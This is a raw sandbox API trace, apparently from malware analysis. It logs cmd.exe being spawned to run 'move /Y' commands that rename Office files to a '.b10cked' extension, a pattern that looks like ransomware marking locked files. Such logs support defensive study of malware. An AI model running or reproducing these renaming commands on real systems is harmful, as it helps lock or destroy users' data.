lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e964 | out: phkResult=0x26e964*=0x40) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0xa0, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x0, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegCloseKey (hKey=0x40) returned 0x0 [0168.686] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e964 | out: phkResult=0x26e964*=0x40) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x40, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x1, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x0, lpcbData=0x26e968*=0x4) returned 0x0 [0168.686] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x9, lpcbData=0x26e968*=0x4) returned 0x0 [0168.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x4, lpData=0x26e970*=0x9, lpcbData=0x26e968*=0x4) returned 0x0 [0168.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e96c, lpData=0x26e970, lpcbData=0x26e968*=0x1000 | out: lpType=0x26e96c*=0x0, lpData=0x26e970*=0x9, lpcbData=0x26e968*=0x1000) returned 0x2 [0168.687] RegCloseKey (hKey=0x40) returned 0x0 [0168.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.687] srand (_Seed=0x5b886386) [0168.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"" [0168.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"" [0168.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.687] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0168.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.688] GetEnvironmentStringsW () returned 0x82360* [0168.689] FreeEnvironmentStringsW (penv=0x82360) returned 1 [0168.689] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.689] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.689] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.689] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.689] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.689] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.689] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.689] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.689] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.689] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f730 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f730, lpFilePart=0x26f72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f72c*="Desktop") returned 0x18 [0168.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.690] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4ac | out: lpFindFileData=0x26f4ac) returned 0x809f0 [0168.690] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0168.690] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f4ac | out: lpFindFileData=0x26f4ac) returned 0x809f0 [0168.690] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0168.690] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f4ac | out: lpFindFileData=0x26f4ac) returned 0x809f0 [0168.690] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0168.691] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.691] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.691] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.691] GetEnvironmentStringsW () returned 0x80210* [0168.691] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0168.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.692] GetConsoleOutputCP () returned 0x1b5 [0168.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.692] GetUserDefaultLCID () returned 0x409 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f870, cchData=128 | out: lpLCData="0") returned 2 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f870, cchData=128 | out: lpLCData="0") returned 2 [0168.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f870, cchData=128 | out: lpLCData="1") returned 2 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.693] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.695] GetConsoleTitleW (in: lpConsoleTitle=0x70930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.695] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.695] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.695] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.696] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.696] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.696] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.696] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.696] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.696] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.696] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0168.705] GetConsoleTitleW (in: lpConsoleTitle=0x26f568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.958] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.958] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.958] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.958] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.958] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.958] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.958] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.958] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.958] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.958] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.958] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.958] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.958] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.958] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.958] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.958] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.959] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.959] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.959] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.959] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.959] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.959] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.959] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.959] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.959] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.959] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.959] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.959] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.959] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.959] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.959] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.959] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.959] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.959] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.959] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.961] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f324, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f31c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f31c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.962] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.963] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.964] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0168.964] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0168.964] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0168.964] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~2.trx")) returned 0x2020 [0168.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.964] SetErrorMode (uMode=0x0) returned 0x0 [0168.964] SetErrorMode (uMode=0x1) returned 0x0 [0168.965] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x26ecac, lpFilePart=0x26ec94 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", lpFilePart=0x26ec94*="MSOINT~2.TRX") returned 0x3c [0168.965] SetErrorMode (uMode=0x0) returned 0x1 [0168.965] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.965] _wcsicmp (_String1="MSOINT~2.TRX", _String2=".") returned 63 [0168.965] _wcsicmp (_String1="MSOINT~2.TRX", _String2="..") returned 63 [0168.965] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~2.trx")) returned 0x2020 [0168.965] SetErrorMode (uMode=0x0) returned 0x0 [0168.965] SetErrorMode (uMode=0x1) returned 0x0 [0168.965] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", nBufferLength=0x104, lpBuffer=0x26f128, lpFilePart=0x26eec0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", lpFilePart=0x26eec0*="MSOINT~2.TRX") returned 0x3c [0168.965] SetErrorMode (uMode=0x0) returned 0x1 [0168.966] SetErrorMode (uMode=0x0) returned 0x0 [0168.966] SetErrorMode (uMode=0x1) returned 0x0 [0168.966] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f330, lpFilePart=0x26eec0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x26eec0*="MSOINTL.REST.trx_dll.b10cked") returned 0x4c [0168.966] SetErrorMode (uMode=0x0) returned 0x1 [0168.966] SetLastError (dwErrCode=0x0) [0168.966] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll.b10cked")) returned 0xffffffff [0168.966] GetLastError () returned 0x2 [0168.966] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e83c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e83c) returned 0x82130 [0168.967] FindNextFileW (in: hFindFile=0x82130, lpFindFileData=0x26e83c | out: lpFindFileData=0x26e83c) returned 0 [0168.967] GetLastError () returned 0x12 [0168.967] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0168.972] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x81cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81cc0) returned 0x82130 [0168.973] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0168.976] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x26ead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0168.976] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll")) returned 0x2020 [0168.976] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.978] FindClose (in: hFindFile=0x82130 | out: hFindFile=0x82130) returned 1 [0168.978] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea88 | out: _Buffer=" 1") returned 9 [0168.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.978] GetFileType (hFile=0x7) returned 0x2 [0168.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.978] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea14 | out: lpMode=0x26ea14) returned 1 [0168.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea48 | out: lpConsoleScreenBufferInfo=0x26ea48) returned 1 [0168.979] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.980] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea6c*=0x1a) returned 1 [0168.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.981] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.981] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.981] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.982] SetConsoleInputExeNameW () returned 0x1 [0168.982] GetConsoleOutputCP () returned 0x1b5 [0168.982] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.982] exit (_Code=0) Process: id = "290" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" 